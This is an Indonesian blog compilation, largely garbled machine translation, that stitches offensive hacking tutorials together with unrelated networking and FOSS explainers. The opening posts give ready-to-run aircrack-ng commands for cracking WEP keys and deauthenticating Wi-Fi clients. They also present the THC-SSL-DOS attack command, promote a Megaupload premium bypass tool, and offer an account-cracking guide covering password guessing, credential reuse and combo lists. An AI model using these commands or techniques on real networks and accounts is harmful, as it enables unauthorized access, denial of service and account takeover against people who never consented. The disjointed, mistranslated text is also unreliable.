game

#
gagasg

Hacking Wifi - Menembus Pertahanan WEP Keys

#
Menembus Pertahanan WEP Keys BackTrack 4:

1). Jalankan BackTrack.

2). Reset driver wireless. Ketikkan:

#airmon-ng -> cek interface ath yang aktif
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila ath1 aktif
#airmon-ng start wifi0

3). Buka 3 buah console.

4). Console 1, ketikkan:

#airodump-ng ath0 -> scanning hotspot yang aktif.
#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0


Keterangan:

Proses ini untuk mengcapture informasi dapat membantu dalam menembus WEP Key.

--bssid -> MAC-Address dari AP yang akan di crack

-w target -> hasil capture ini akan disimpan di file yang namanya target

5). Console 2, ketikkan:

Untuk membantu menciptakan pengumpulan paket data

#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0

Keterangan:

-b -> MAC-Address dari AP.

-h -> MAC-Address dari client yang aktif terhubung ke AP.

6). Console 3, ketikkan:

Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.

#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

-c -> MAC-Address dari Client

-a -> MAC-Address dari AP

7). Setelah terkumpul paket data yang cukup, dilakukan cracking:

#aircrack-ng target*.cap

Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.

Hacking Wifi - Melumpuhkan Client Terhubung AP

#
Langkah -langkah Melumpuhkan Client yang terhubung pada suatu AP dengan BackTrack 4 :

1). Jalankan Live CD LinuxBackTrack 4 R2.

2). Jalankan Kismet untuk mengetahui MAC-Address AP dan MAC-Address Client serta channel dari AP. Lalu catat semua infrmasi yang didapat.

3). Tutup Kismet, lalu buka console, ketikkan:

#airmon-ng stop ath0 -> untuk mematikan driver ath0
#airmon-ng stop ath1 -> untuk mematikan driver ath1
#airmon-ng start wifi0 -> menghidupkan/mengaktifkan driver

4). Jalankan scanning wireless menggunakan Airodump :

#airodump-ng ath0

5). Berikutnya buka konsole satu lag(dgn Airodump masih aktif jalan) lakukan setting ath0 untuk melakukan serangan (De Authentication) pada komputer client (target). Ketikkan:

#ifconfig ath0 up -> untuk mengaktifkan ath0

#iwconfig ath0 mode monitor channel 11 -> menentukan agar ath0 dalam mode monitor, sedangkan angka 11 merupakan channel yang dipakai oleh AP (didapatkan dari hasil scanning Kismet).

6). Langkah terakhir, kita lakukan serangan, ketikkan:

#aireplay-ng --deauth 20 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:


Aireplay-ng -> program yang digunakan untuk melakukan de authentication

--deauth -> option untuk serangan de authentication

20 -> jumlah sending packet

00:0E:2E:C1:1E:83 -> MAC-Address komputer target

-a -> option untuk Access Point

00:0E:2E:C2:2C:0E -> MAC-Address Access Point

ath0 -> interface yang digunakan untuk menyerang

DOS baru alat untuk Membunuh server SSL - Tutorial Lengkap

#
DOS baru alat untuk Membunuh server SSL - Tutorial Lengkap
Sebuah penolakan-of-service baru dirilis (DOS) alat dapat digunakan untuk menjatuhkan server SSL menggunakan komputer laptop rata-rata dan koneksi DSL standar.
Pakaian hacker memutuskan untuk melepaskan alat, disebut THC-SSL-DOS, sekarang karena sudah bocor online beberapa bulan lalu. "Kami berharap bahwa keamanan mencurigakan dalam SSL tidak pergi tak ketahuan. Industri harus langkah untuk memperbaiki masalah sehingga warga yang aman dan aman lagi," kata seorang anggota THC.



Ini perlu menunjukkan bahwa bahkan tanpa negosiasi ulang SSL diaktifkan, penyerang masih dapat menggunakan THC-SSL-DOS berhasil terhadap server. Namun, serangan tersebut akan membutuhkan lebih dari sebuah laptop tunggal.

"Ini masih bekerja jika renegosiasi SSL tidak didukung, tetapi memerlukan beberapa modifikasi dan bot lagi sebelum efek dapat dilihat," kata kelompok itu. "Mengambil peternakan server yang lebih besar yang memanfaatkan balancers beban SSL diperlukan 20 laptop ukuran rata-rata dan sekitar 120kbit/sec lalu lintas," katanya menambahkan.
Download THC-SSL-DOS

Cara kerjanya:

Unzip file yang didownload untuk setiap drive.
Mengubah prompt ke drive di mana Anda telah membuka ritsleting alat.
Ubah direktori ke THC-ssl-dos.
Sekarang jalankan file exe. Lulus perintah THC-ssl-dos untuk melaksanakannya. Gambar di bawah menunjukkan langkah di atas.



Sekarang dalam rangka untuk melakukan serangan menggunakan alat ini, Anda akan harus melewati perintah berikut;

thc-ssl-dos TARGET IP --accept
Pada melewati perintah berikut alat akan memulai proses tersebut.
Gambar di bawah menunjukkan proses ini.



Anda juga dapat men-download kode sumber dan menganalisanya untuk memiliki pemahaman yang lebih dalam dari alat.

Gunakan Megaupload sebagai Pengguna Premium

#
Gunakan Megaupload sebagai Pengguna Premium

Hari ini Saya Memposting Tentang Account Premium Megaupload , ini Ada Sedikit Trick Dari Saya Semoga Berguna Bagi Anda Semua ..
Yang harus Anda lakukan adalah men-download software ini dan setelah Itu install Softwarenya, login dengan account gratis megaupload Anda, mengubah manfaat dan penggunaan megaupload sebagai pengguna premium.



Apa manfaat dari megakey bagi Anda?
1) Ini akan menghapus pembatasan pada megaupload dan megavideo.
2) Menyediakan akses premium jam senang semua situs mega.
3) Hal ini memungkinkan untuk sampai ultra cepat & berkat download untuk teknologi multiplexing.
4) Ini mengidentifikasi file musik pada PC Anda dan membuat mereka tersedia dalam megabox Anda.
5) Ini memberi Anda koneksi langsung ke server mega.
6) Tidak ada penundaan dan ketersediaan. Di masa depan Anda mendapatkan akses gratis untuk film, musik dan game berlisensi oleh mega.

Megakey adalah mimpi Anda menjadi kenyataan.

Aktifkan layanan premium mega dengan menginstal Megakey pada PC Anda.

Program ini pada dasarnya menawarkan layanan premium kepada semua anggota Megaupload gratis dan hanya memerlukan download sederhana:

Download Here:

Ziddu Here

Jangan Lupa Follow And Comment
kalau ada pertanyaan comment dan tanya kepada saya ..
Salam Blogger ..

Bypass 25.000 Situs Pendaftaran Wajib

#
Bypass 25.000 Situs Pendaftaran Wajib
Situs Ini adalah layanan internet yang menyediakan username dan password untuk membiarkan pengguna internet wajib memotong pendaftaran gratis di situs Web .

Situs ini memungkinkan pengguna layanan mereka untuk menambahkan account baru untuk situs dengan pendaftaran gratis. Hal ini juga mendorong pengguna untuk menggunakan layanan seperti account palsu e-mail sebagai Mailinator dan Spamgourmet untuk membuat account tersebut.


Situs ini Juga menyediakan ekstensi untuk browser. jika Anda memiliki account apapun & pass maka Anda dapat mengirimkan sini tapi jangan berbagi Anda thats real account yang ingin Anda gunakan secara teratur.



Jangan Disalah Gunakan ...

Konsep Cracking

#
Konsep Cracking

Artikel ini dimaksudkan untuk memandu Anda untuk sukses membobol akun. Jadi mari kita langsung saja.

Prinsip utama Cracking

Satu sulit untuk memahami fakta cracker baru datang untuk mencari tahu adalah cracking account tertentu biasanya sulit. Memahami fakta ini adalah langkah kunci untuk menjadi cracker berhasil. Ada sukses besar dalam jumlah. Akun pengguna yang lebih Anda harus mencoba dan retak, semakin besar kemungkinan Anda akan sukses. Alasan dibalik ini sangat sederhana dan logis. Jika Anda memiliki sepasang dadu, dan perlu roll mata ular (dua orang), semakin mencoba yang Anda miliki, maka peluang keberhasilan.

Prinsip utama dari cracking adalah berusaha sebagai pengguna sah banyak (akan dibahas nanti) mungkin. Meskipun apa yang orang lain mungkin berpikir, memiliki 10.000 account pengguna untuk mencoba dan retak skenario jauh lebih baik daripada memiliki account pengguna 3 dan 10.000 password.

Dumb Pengguna Internet

Kebanyakan orang di internet tidak memperhatikan keamanan serius. Ada gagasan salah paham tentang internet bahwa itu aman dan anonim. Kurangnya perhatian menyebabkan password ditebak dan umum. Pola, kata-kata umum, dan nama-nama umum biasanya password mungkin. Ini biasanya dipilih oleh para pengguna karena mereka mudah diingat. Lain selang umum dalam penilaian adalah kenyataan bahwa pengguna biasanya menggunakan password yang sama untuk semua hal yang mereka punya password untuk; rekening bank atau kartu kredit, E-Mail account, dan cukup banyak hal lain yang dapat Anda bayangkan.

Semua Tentang Sandi

Memilih password untuk memecahkan dengan adalah kritis terhadap keberhasilan Anda. Menggunakan "tert34g" sebagai kata sandi untuk memecahkan dengan adalah bukan ide yang baik. Ya, ada beberapa kemungkinan kecil bahwa Anda dapat mencapai salah satu upaya sukses dengan itu, tapi itu membuang-buang waktu.

Pikirkan tentang hal ini. Apa yang kebanyakan orang memiliki kesamaan? Nama, makanan favorit, binatang favorit, tim olahraga favorit, warna favorit, dll Daripada mengandalkan yang sudah ada sebelumnya daftar password, coba buat sendiri. Mengapa? Hal-hal berubah. Apa yang populer tahun lalu tidak lagi populer. MySpace sebagai password adalah logis dua tahun lalu. Sekarang, kebanyakan orang tidak login ke MySpace mereka di bulan. ide unik Anda mungkin memberikan Anda sukses besar. Pikirkan tentang apa yang populer sekarang ... Justin Bieber, Obama, atau panas Miami. Saya yakin Anda pernah berpikir dari "panas" sebagai password.

password Selektif adalah apa yang saya sebut password yang hanya berlaku untuk satu situs Web. Jika Anda mencoba untuk memecahkan akun Facebook, password seperti facebook, Facebook, atau FACEBOOK kemungkinan untuk sukses. Jika Anda ingin pergi lebih lanjut, pergi ke mengapa orang menggunakan Facebook. Anda dapat secara logis sampai pada kesimpulan bahwa orang-orang menggunakannya untuk teman, teman, dll Itu adalah password logis. Nama situs web adalah salah satu password yang paling umum digunakan oleh pengguna karena mudah diingat, dan bahwa logika yang sama berlaku untuk setiap situs mereka memiliki account dengan.

Password biasanya malas. Kebanyakan orang terlalu malas untuk menempatkan usaha apapun menjadi password, sehingga orang jarang akan memanfaatkan password. Setiap bagian dari password. Biasanya, password cased seperti Michelle jarang berhasil. Gerakan tambahan yang dibutuhkan untuk mencapai tombol shift biasanya tidak gerakan diinginkan untuk kebanyakan pengguna. password huruf kecil yang jauh yang paling populer. password Huruf Besar seperti PASSWORD mengikuti kedua, dan "benar" password cased seperti "Password" yang ketiga.

Nama sebagai password = sukses. Salah satu metode yang paling berhasil untuk cracking menggunakan nama pengguna sebagai password. password Bobby adalah mungkin bobby, dan Janet kemungkinan Janet. Anda dapat pergi lebih jauh, dan menghapus nomor dengan beberapa program. password Bobby1945 adalah mungkin bobby, atau bahkan boby1945. Sekali lagi, kemalasan. Kebanyakan program mendukung penggunaan nama pengguna sebagai password, dan dapat menghapus huruf atau angka dari password untuk kontrol ditambahkan.


Penelitian Website Anda sedang di Cracking


Banyak situs yang menjadi kritis password pengguna mereka '. Sekarang, sebagian besar memerlukan panjang password minimum, dan bahkan memiliki aturan khusus seperti mereka harus berisi angka. Untuk membantu dengan ini, saya akan menjelaskan password yang paling umum harus jenis peraturan berlaku.

Jika situs web membutuhkan sebuah angka, coba password yang umum, dan menambahkan "1", atau nomor telepon lain, di ujungnya. password1, adam1, facebook1 semua cukup masuk akal dan malas (yang adalah apa yang akan Anda untuk).

Jika situs web memerlukan huruf besar, coba memanfaatkan huruf pertama, atau semua huruf: Facebook, Password, PASSWORD, CINTA.

Jika situs web memerlukan huruf kapital dan angka, coba kapitalisasi huruf pertama dan menambahkan "1", atau nomor telepon lain, di akhir: Password1, Michelle1, Rachel1.

Jika situs web memerlukan simbol, coba tanda seru atau suatu periode pada akhir password umum (!) (.): Password, iloveyou, dll!.

Penelitian akan mencegah Anda dari membuang waktu. Jika Anda tidak melakukan penelitian yang tepat, dan Anda cracking situs yang membutuhkan password dengan panjang lebih dari 4, dan Anda menggunakan "1234" sebagai password, Anda tidak melakukan sedikit lain baik dari membuang bit dan byte bandwidth.

Mencoba Situs Lain dengan Cracked Account
9 kali dari 10, pengguna memiliki setidaknya dua account dengan password yang sama. Sebuah situasi yang ideal adalah ketika Anda retak account, dan melihat informasi account, kemudian menemukan alamat E-Mail pengguna. Ini bukan bahkan 50% mungkin, tapi ada kesempatan yang lebih baik dari biasanya bahwa Anda tahu bahwa password E-Mail address's. Jika dan ketika anda mengakses account E-Mail, itu mungkin bahwa semua situs lain pengguna telah terdaftar di telah mengirimkan dia atau nya E-Mail. Tidak banyak orang yang bersih kotak E-Mail mereka.


Jangan Crack Air; Gunakan Pengguna Valid

Jika sebuah akun tidak ada, mengapa anda mencoba untuk memecahkannya selain membuang-buang waktu? Memahami bahwa seperti password, banyak nama pengguna adalah kata-kata umum, frasa, atau pola. bobby1 lebih mungkin ada dari bobby10382.

Pada saat ini, ada beberapa program yang tersedia untuk memvalidasi apakah atau tidak rekening ada. Saya tidak akan membahas atau daftar program ini, tetapi melakukan penelitian, melainkan bernilai baik.

Combo (Database Password)

Combo, sebagaimana mereka disebut oleh cracker kebanyakan, adalah daftar nama pengguna dan password yang telah retak untuk situs lain. Ini adalah sangat sukses, tapi sukses bisa pendek hidup jika pengguna lain memiliki akses ke combo yang sama. Program yang mencari combo berguna, tetapi karena saya hanya menyatakan, keberhasilan mereka memberi bisa pendek hidup. Program ini diprediksi, dengan yang saya berarti bahwa mereka menggunakan mekanisme, yang sama mengumpulkan berulang.

Combo adalah aset besar untuk retak, tapi bisa menjadi demam emas yang pengguna lain dapat "mencuri" kerja keras Anda.

Contoh Daftar

Berikut adalah daftar password contoh kecil dari atas kepala saya yang mungkin akan berhasil:

123456
123456789
ABC123
asdf
asdfghjkl
54321
sandi
password1
lakers
bieber
michael
chris
Yesus
uang
hijau
kuning
biru
harimau
anak anjing
anak kucing
celengan
james
brandon
michelle
elizabeth
stacy

Seperti yang Anda lihat, semua password adalah kata-kata umum, atau mudah diingat pola.

Kesimpulan

Cracking rekening bisa mudah, dan dapat sulit. Ini semua tergantung pada penelitian dan upaya sebelum retak. Sukses ditaburi dengan penelitian.

Definisi Token Ring

#
Token Ring adalah sebuah cara akses jaringan berbasis teknologi ring yang pada awalnya dikembangkan dan diusulkan oleh Olaf Soderblum pada tahun 1969. Perusahaan IBM selanjutnya membeli hak cipta dari Token Ring dan memakai akses Token Ring dalam produk IBM pada tahun 1984. Elemen kunci dari desain Token Ring milik IBM ini adalah penggunaan konektor buatan IBM sendiri (proprietary), dengan menggunakan kabel twisted pair, dan memasang hub aktif yang berada di dalam sebuah jaringan komputer.

Sambungan komputer dalam topologi ring
Pada tahun 1985, Asosiasi IEEE di Amerika Serikat meratifikasi standar IEEE 802.5 untuk protokol (cara akses) Token Ring, sehingga protokol Token Ring ini menjadi standar internasional. Pada awalnya, IBM membuat Token Ring sebagai pengganti untuk teknologi Ethernet (IEEE 802.3) yang merupakan teknologi jaringan LAN paling populer. Meskipun Token Ring lebih superior dalam berbagai segi, Token Ring kurang begitu diminati mengingat beaya implementasinya lebih tinggi jika dibandingkan dengan Ethernet.
Spesifikasi asli dari standar Token Ring adalah kemampuan pengiriman data dengan kecepatan 4 megabit per detik (4 Mbps), dan kemudian ditingkatkan empat kali lipat, menjadi 16 megabit per detik. Pada jaringan topologi ring ini, semua node yang terhubung harus beroperasi pada kecepatan yang sama. Implementasi yang umum terjadi adalah dengan menggunakan ring 4 megabit per detik sebagai penghubung antar node, sementara ring 16 megabit per detik digunakan untuk backbone jaringan.
Beberapa spesifikasi dan standar teknis Token Ring yang lain, seperti enkapsulasi Internet Protocol (IP) dan Address Resolution Protocol (ARP) dalam Token Ring dijelaskan dalam RFC 1042.
Dengan Token-Ring, peralatan network secara fisik terhubung dalam konfigurasi (topologi) ring di mana data dilewatkan dari devais/peralatan satu ke devais yang lain secara berurutan. Sebuah paket kontrol yang dikenal sebagai token akan berputar-putar dalam jaringan ring ini, dan dapat dipakai untuk pengiriman data. Devais yang ingin mentransmit data akan mengambil token, mengisinya dengan data yang akan dikirimkan dan kemudian token dikembalikan ke ring lagi. Devais penerima/tujuan akan mengambil token tersebut, lalu mengosongkan isinya dan akhirnya mengembalikan token ke pengirim lagi. Protokol semacam ini dapat mencegah terjadinya kolisi data (tumbukan antar pengiriman data) dan dapat menghasilkan performansi yang lebih baik, terutama pada penggunaan high-level bandwidth.
Ada tiga tipe pengembangan dari Token Ring dasar: Token Ring Full Duplex, switched Token Ring, dan 100VG-AnyLAN. Token Ring Full Duplex menggunakan bandwidth dua arah pada jaringan komputer. Switched Token Ring menggunakan switch yang mentransmisikan data di antara segmen LAN (tidak dalam devais LAN tunggal). Sementara, standar 100VG-AnyLAN dapat mendukung baik format Ethernet maupun Token Ring pada kecepatan 100 Mbps.

TCP/IP

#
TCP/IP (singkatan dari Transmission Control Protocol/Internet Protocol) adalah standar komunikasi data yang digunakan oleh komunitas internet dalam proses tukar-menukar data dari satu komputer ke komputer lain di dalam jaringan Internet. Protokol ini tidaklah dapat berdiri sendiri, karena memang protokol ini berupa kumpulan protokol (protocol suite). Protokol ini juga merupakan protokol yang paling banyak digunakan saat ini. Data tersebut diimplementasikan dalam bentuk perangkat lunak (software) di sistem operasi. Istilah yang diberikan kepada perangkat lunak ini adalah TCP/IP stack
Protokol TCP/IP dikembangkan pada akhir dekade 1970-an hingga awal 1980-an sebagai sebuah protokol standar untuk menghubungkan komputer-komputer dan jaringan untuk membentuk sebuah jaringan yang luas (WAN). TCP/IP merupakan sebuah standar jaringan terbuka yang bersifat independen terhadap mekanisme transport jaringan fisik yang digunakan, sehingga dapat digunakan di mana saja. Protokol ini menggunakan skema pengalamatan yang sederhana yang disebut sebagai alamat IP (IP Address) yang mengizinkan hingga beberapa ratus juta komputer untuk dapat saling berhubungan satu sama lainnya di Internet. Protokol ini juga bersifat routable yang berarti protokol ini cocok untuk menghubungkan sistem-sistem berbeda (seperti Microsoft Windows dan keluarga UNIX) untuk membentuk jaringan yang heterogen.
Protokol TCP/IP selalu berevolusi seiring dengan waktu, mengingat semakin banyaknya kebutuhan terhadap jaringan komputer dan Internet. Pengembangan ini dilakukan oleh beberapa badan, seperti halnya Internet Society (ISOC), Internet Architecture Board (IAB), dan Internet Engineering Task Force (IETF). Macam-macam protokol yang berjalan di atas TCP/IP, skema pengalamatan, dan konsep TCP/IP didefinisikan dalam dokumen yang disebut sebagai Request for Comments (RFC) yang dikeluarkan oleh IETF.

Arsitektur

Arsitektur TCP/IP tidaklah berbasis model referensi tujuh lapis OSI, tetapi menggunakan model referensi DARPA. Seperti diperlihatkan dalam diagram, TCP/IP merngimplemenasikan arsitektur berlapis yang terdiri atas empat lapis. Empat lapis ini, dapat dipetakan (meski tidak secara langsung) terhadap model referensi OSI. Empat lapis ini, kadang-kadang disebut sebagai DARPA Model, Internet Model, atau DoD Model, mengingat TCP/IP merupakan protokol yang awalnya dikembangkan dari proyek ARPANET yang dimulai oleh Departemen Pertahanan Amerika Serikat.
Setiap lapisan yang dimiliki oleh kumpulan protokol (protocol suite) TCP/IP diasosiasikan dengan protokolnya masing-masing. Protokol utama dalam protokol TCP/IP adalah sebagai berikut:

Pengalamatan

Protokol TCP/IP menggunakan dua buah skema pengalamatan yang dapat digunakan untuk mengidentifikasikan sebuah komputer dalam sebuah jaringan atau jaringan dalam sebuah internetwork, yakni sebagai berikut:
  • Pengalamatan IP: yang berupa alamat logis yang terdiri atas 32-bit (empat oktet berukuran 8-bit) yang umumnya ditulis dalam format www.xxx.yyy.zzz. Dengan menggunakan subnet mask yang diasosiasikan dengannya, sebuah alamat IP pun dapat dibagi menjadi dua bagian, yakni Network Identifier (NetID) yang dapat mengidentifikasikan jaringan lokal dalam sebuah internetwork dan Host identifier (HostID) yang dapat mengidentifikasikan host dalam jaringan tersebut. Sebagai contoh, alamat 205.116.008.044 dapat dibagi dengan menggunakan subnet mask 255.255.255.000 ke dalam Network ID 205.116.008.000 dan Host ID 44. Alamat IP merupakan kewajiban yang harus ditetapkan untuk sebuah host, yang dapat dilakukan secara manual (statis) atau menggunakan Dynamic Host Configuration Protocol (DHCP) (dinamis).
  • Fully qualified domain name (FQDN): Alamat ini merupakan alamat yang direpresentasikan dalam nama alfanumerik yang diekspresikan dalam bentuk <nama_host>.<nama_domain>, di mana mengindentifikasikan jaringan di mana sebuah komputer berada, dan mengidentifikasikan sebuah komputer dalam jaringan. Pengalamatan FQDN digunakan oleh skema penamaan domain Domain Name System (DNS). Sebagai contoh, alamat FQDN id.wikipedia.org merepresentasikan sebuah host dengan nama "id" yang terdapat di dalam domain jaringan "wikipedia.org". Nama domain wikipedia.org merupakan second-level domain yang terdaftar di dalam top-level domain .org, yang terdaftar dalam root DNS, yang memiliki nama "." (titik). Penggunaan FQDN lebih bersahabat dan lebih mudah diingat ketimbang dengan menggunakan alamat IP. Akan tetapi, dalam TCP/IP, agar komunikasi dapat berjalan, FQDN harus diterjemahkan terlebih dahulu (proses penerjemahan ini disebut sebagai resolusi nama) ke dalam alamat IP dengan menggunakan server yang menjalankan DNS, yang disebut dengan Name Server atau dengan menggunakan berkas hosts (/etc/hosts atau %systemroot%\system32\drivers\etc\hosts) yang disimpan di dalam mesin yang bersangkutan.

Bagaimanakah bentuk arsitektur dari TCP/IP itu ?

Dikarenakan TCP/IP adalah serangkaian protokol di mana setiap protokol melakukan sebagian dari keseluruhan tugas komunikasi jaringan, maka tentulah implementasinya tak lepas dari arsitektur jaringan itu sendiri. Arsitektur rangkaian protokol TCP/IP mendifinisikan berbagai cara agar TCP/IP dapat saling menyesuaikan.
Karena TCP/IP merupakan salah satu lapisan protokol Model OSI, berarti bahwa hierarki TCP/IP merujuk kepada 7 lapisan OSI tersebut. Tiga lapisan teratas biasa dikenal sebagai "upper level protocol" sedangkan empat lapisan terbawah dikenal sebagai "lower level protocol". Tiap lapisan berdiri sendiri tetapi fungsi dari masing-masing lapisan bergantung dari keberhasilan operasi layer sebelumnya. Sebuah lapisan pengirim hanya perlu berhubungan dengan lapisan yang sama di penerima (jadi misalnya lapisan data link penerima hanya berhubungan dengan lapisan data link pengirim) selain dengan satu layer di atas atau di bawahnya (misalnya lapisan network berhubungan dengan lapisan transport di atasnya atau dengan lapisan data link di bawahnya).
Model dengan menggunakan lapisan ini merupakan sebuah konsep yang penting karena suatu fungsi yang rumit yang berkaitan dengan komunikasi dapat dipecahkan menjadi sejumlah unit yang lebih kecil. Tiap lapisan bertugas memberikan layanan tertentu pada lapisan diatasnya dan juga melindungi lapisan diatasnya dari rincian cara pemberian layanan tersebut. Tiap lapisan harus transparan sehingga modifikasi yang dilakukan atasnya tidak akan menyebabkan perubahan pada lapisan yang lain. Lapisan menjalankan perannya dalam pengalihan data dengan mengikuti peraturan yang berlaku untuknya dan hanya berkomunikasi dengan lapisan yang setingkat. Akibatnya sebuah layer pada satu sistem tertentu hanya akan berhubungan dengan lapisan yang sama dari sistem yang lain. Proses ini dikenal sebagai Peer process. Dalam keadaan sebenarnya tidak ada data yang langsung dialihkan antar lapisan yang sama dari dua sistem yang berbeda ini. Lapisan atas akan memberikan data dan kendali ke lapisan dibawahnya sampai lapisan yang terendah dicapai. Antara dua lapisan yang berdekatan terdapat interface (antarmuka). Interface ini mendifinisikan operasi dan layanan yang diberikan olehnya ke lapisan lebih atas. Tiap lapisan harus melaksanakan sekumpulan fungsi khusus yang dipahami dengan sempurna

FOSS [ Free Open Source Software ]

#
I. APA ITU FREE/OPEN SOURCE SOFTWARE

Menurut David Wheeler, secara umum program yang dinamakan free software (perangkat lunak bebas) atau open source software (perangkat lunak sumber terbuka) adalah program yang lisensinya memberi kebebasan kepada pengguna menjalankan program untuk apa saja, mempelajari dan memodifikasi program, dan mendistribusikan penggandaan program asli atau yang sudah dimodifikasi tanpa harus membayar royalti kepada pengembang sebelumnya. (Sumber: http://www.dwheeler.com/off_fs_why.html). Free/Open Source Software (FOSS) atau perangkat lunak bebas dan open source (PLBOS) telah menjadi sebuah fenomena internasional. Dalam beberapa tahun terakhir, FOSS mengalami perubahan besar dari sebuah kata yang relatif tidak dikenal menjadi sebuah kata popular terbaru. Namun, istilah FOSS tetap belum mudah dipahami mengingat FOSS merupakan konsep baru, misalnya apa saja pengertian FOSS dan apa saja cabang atau jenis-jenisnya. Bab-bab selanjutnya berikut ini memberikan penjelasan yang baik tentang fenomena FOSS, filosofinya, perbedaannya dengan program yang bukan FOSS, dan metoda pengembangannya.

II. FILOSOFI FOSS

Ada dua filosofi pokok pada kata FOSS, yaitu filosofi dari FSF (Free Software Foundation) atau Yayasan perangkat Lunak Bebas, dan filosofi dari OSI (Open Source Initiative) atau Inisiatif Sumber Terbuka. Kita mulai pembahasan dengan filosofi FSF, sesuai dengan urutan sejarah dan karena posisi FSF sebagai pionir dalam gerakan FOSS ini. Tokoh utama gerakan FSF adalah Richard M. Stallman, sedangkan tokoh gerakan OSI adalah Eric S. Raymond dan Bruce Perens.
Menurut FSF, perangkat lunak bebas mengacu pada kebebasan para penggunanya untuk menjalankan, menggandakan, menyebarluaskan/menditribusikan, mempelajari, mengubah dan meningkatkan kinerja perangkat lunak. Tepatnya, mengacu pada empat jenis kebebasan bagi para pengguna perangkat lunak, yaitu:
  1. Kebebasan untuk menjalankan programnya untuk tujuan apa saja (kebebasan 0).
  2. Kebebasan untuk mempelajari bagaimana program itu bekerja serta dapat disesuaikan dengan kebutuhan anda (kebebasan 1). Akses pada kode program merupakan suatu prasyarat.
  3. Kebebasan untuk menyebarluaskan kembali hasil salinan perangkat lunak tersebut sehingga dapat membantu sesama anda (kebebasan 2).
  4. Kebebasan untuk meningkatkan kinerja program, dan dapat menyebarkannya ke khalayak umum sehingga semua menikmati keuntungannya (kebebasan 3). Akses pada kode program merupakan suatu prasyarat juga.
Filosofi OSI agak berbeda. Ide dasar open source sangat sederhana. Jika para pemrogram dapat mempelajari, mendistribusikan ulang, dan mengubah kode sumber sebagian perangkat lunak, maka perangkat lunak itu berkembang. Masyarakat mengembangkannya, mengaplikasikannya, dan memperbaiki kelemahannya.
OSI difokuskan pada nilai-nilai teknis dalam pembuatan perangkat lunak yang berdaya guna dan dapat dihandalkan, dan pendekatan istilah OSI ini lebih sesuai kebutuhan bisnis daripada filosofi FSF. OSI tidak terlalu fokus pada isu moral seperti yang ditegaskan FSF, dan lebih fokus pada manfaat praktis dari metoda
pengembangan terdistribusi dari FOSS. Meskipun filosofi dasar kedua gerakan ini berbeda, FSF dan OSI berbagi area yang sama dan bekerja sama dalam hal-hal praktis, seperti pengembangan perangkat lunak, usaha melawan perangkat lunak proprietary, paten perangkat lunak, dan sejenisnya. Richard Stallman mengatakan bahwa gerakan perangkat lunak bebas dan gerakan open source merupakan dua “partai politik” dalam komunitas yang sama.

III. METODA PENGEMBANGAN FOSS

Model pengembangan FOSS adalah unik, dan menjadi sukses karena muncul bersamaan dengan berkembangnya internet dan efeknya yang luar biasa di bidang komunikasi. Analogi Katedral dan Bazar digunakan untuk membedakan model pengembangan FOSS (Bazar) dengan metode pengembangan perangkat lunak tradisional (Katedral).
Pengembangan perangkat lunak tradisional diibaratkan dengan cara katedral dibangun pada masa lalu. Kelompok kecil tukang batu secara hati-hati merencanakan sebuah desain dalam tempat yang terisolasi, dan segala sesuatunya dibuat dalam sebuah usaha tunggal. Sekali katedral berhasil dibangun, maka dianggap selesai, dan hanya sedikit dilakukan perubahan lanjutan. Perangkat lunak secara tradisional dibuat dengan gaya yang serupa itu. Sekelompok pemrogram bekerja dalam suatu isolasi (misalnya di sebuah perusahaan), dengan perencanaan dan manajemen yang hati-hati, hingga bekerjaanya selesai dan program dirilis ke publik. Sekali dirilis, program dianggap selesai, dan selanjutnya hanya ada pekerjaan terbatas untuk program itu.
Sebaliknya, pengembangan FOSS lebih mirip dengan sebuah bazar, yang tumbuh secara organis. Dalam sebuah bazar, pedagang awal datang, membangun struktur, dan memulai bisnis. Pedagang-pedagang berikutnya datang dan membangun strukturnya masing-masing. Perkembangan bazar nampak menjadi gaya yang tidak teratur. Pada dasarnya para pedagang diarahkan untuk membangun struktur minimal yang dapat berfungsi sehingga mereka bisa memulai berjualan. Tambahan dibuat sesuai kebutuhan dan keadaaan selanjutnya. Dengan model serupa, pengembangan FOSS dimulai dari yang tidak terstruktur. Pengembang merilis kode programnya ke publik meskipun baru berfungsi secara minimal, dan kemudian mengubah programnya sesuai umpan balik yang diberikan publik. Pengembang lain bisa ikut mengembangkan program itu berdasar kode-kode yang telah ada. Pada periode waktu tertentu, keseluruhan sistem operasi dan aplikasi menjadi tumbuh dan berkembang secara terus menerus.
Metoda pengembangan “bazar” telah dijadikan pilihan untuk mendapatkan beberapa kelebihan berikut ini:
  1. Mengurangi duplikasi kerja: Dengan merilis program lebih cepat, dan memberikan izin kepada pengguna untuk megubah dan meredistribusi kode sumber, pengembang FOSS memanfaatkan kembali karya yang dihasilkan oleh compatriots. Skala ekonomi dapat menjadi sangat besar. Daripada 5 pengembang software pada sepuluh perusahaan mengembangkan aplikasi jaringan yang sama, ada potensi 50 pengembang melakukan secara bersamaan membentuk kerja sama kombinasi. Mengurangi duplikasi kerja akan membuat skala pengembangan FOSS menjadi besar, karena ribuan pengembang di seluruh dunia dapat bekerja sama.
  2. Membangun di atas karya lain: Dengan ketersediaan kode sumber untuk membangun program, waktu pengembangan menjadi pendek. Banyak projek FOSS berbasis program yang dihasilkan projek lain untuk menambah fungsionalitas yang diperlukan. Sebagai contoh, projek server web Apache lebih memilih memanfaatkan projek OpenSSL daripada menulis sendiri kode kriptografi, sehingga mengehmat jutaan jam untuk pembuatan program dan pengujiannya. Bahkan jika kode sumber tidak dapat secara langsung digabungkan, ketersediaan kode sumber memudahkan pengembang untuk belajar bagaimana projek lain memecahkan masalah yang sama.
